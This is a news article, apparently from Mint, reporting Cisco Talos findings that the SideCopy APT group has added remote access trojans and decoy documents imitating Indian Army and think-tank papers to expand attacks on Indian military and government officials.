OPEN APP
Home / Technology / News /  SideCopy expands hacking ops to target Indian govt officials

SideCopy expands hacking ops to target Indian govt officials

APT group known as SideCopy has added new remote access trojans (RATs) to their arsenal and the group observed an expansion in activity of the group’s malware campaigns targeting entities in India. (Photo: Reuters)Premium
APT group known as SideCopy has added new remote access trojans (RATs) to their arsenal and the group observed an expansion in activity of the group’s malware campaigns targeting entities in India. (Photo: Reuters)

Once infected, SideCopy uses tools like keyloggers, file enumerators and others to steal data from victims. They target web browsers like Chrome and Opera, and apps like CCleaner. They deliver malware to victims through fake websites or using compromised websites

NEW DELHI : An advanced persistent threat (APT) group that predominantly targets Indian army personnel has increased its activity this year.

The group, which was first discovered by antivirus maker Quickheal in 2020, has expanded its operations and added to its arsenal of infection techniques, targeting government officials and the Kavach application built by the National Informatics Centre (NIC) for accessing government emails.

The APT group known as SideCopy has added new remote access trojans (RATs) to their arsenal, according to intelligence group Cisco Talos. Talos observed an “expansion in activity" of the group’s malware campaigns targeting entities in India. APT groups are hacker groups usually backed by states that target countries’ infrastructure, national security mechanisms etc.

“SideCopy uses themes designed to target military personnel in the Indian subcontinent. Many of the LNK files (a type of file that forensic investigators used to access metadata about recently accessed files, including deleted items) and decoy documents used in their attacks pose as internal, operational documents of the Indian Army," the research said. The attackers have “special interest" in victims from India and Pakistan.

The tactics used by the group are similar to another APT group called Transparent Tribe, whose existence has been traced to as far back as 2013 by various security firms. Proofpoint, a security firm, had found malicious emails sent to Indian embassies in Saudi Arabia and Kazakhstan in 2016.

“More recently in 2021, we have seen an increase in attempts to infect their victims. Their proliferation is also evident from the fact that we’ve discovered RATs and malicious plug-ins now being used by SideCopy," Asheer Malhotra, a research engineer at Talos, said.

The attackers used multiple government and policy documents from related firms to infect victims. Talos found decoy documents imitating research papers from the Centre for Joint Warfare Studies and one posing as an advertisement for a call for proposals for the Chair of Excellence 2021 for the Centre for Land and Warfare Studies (CLAWS). It also uses calls for job openings for think tanks in India to target potential victims. One infection also posed as a seniority list of the Indian Army as recently as 2021.

“The presence of a variety of decoy documents and file names pertaining to military, diplomatic and government-based think tanks indicates a specific targeting of these entities," Malhotra said.

Subscribe to Mint Newsletters
* Enter a valid email
* Thank you for subscribing to our newsletter.

Never miss a story! Stay connected and informed with Mint. Download our App Now!!

Close
×
Edit Profile
Get alerts on WhatsApp
My ReadsRedeem a Gift CardLogout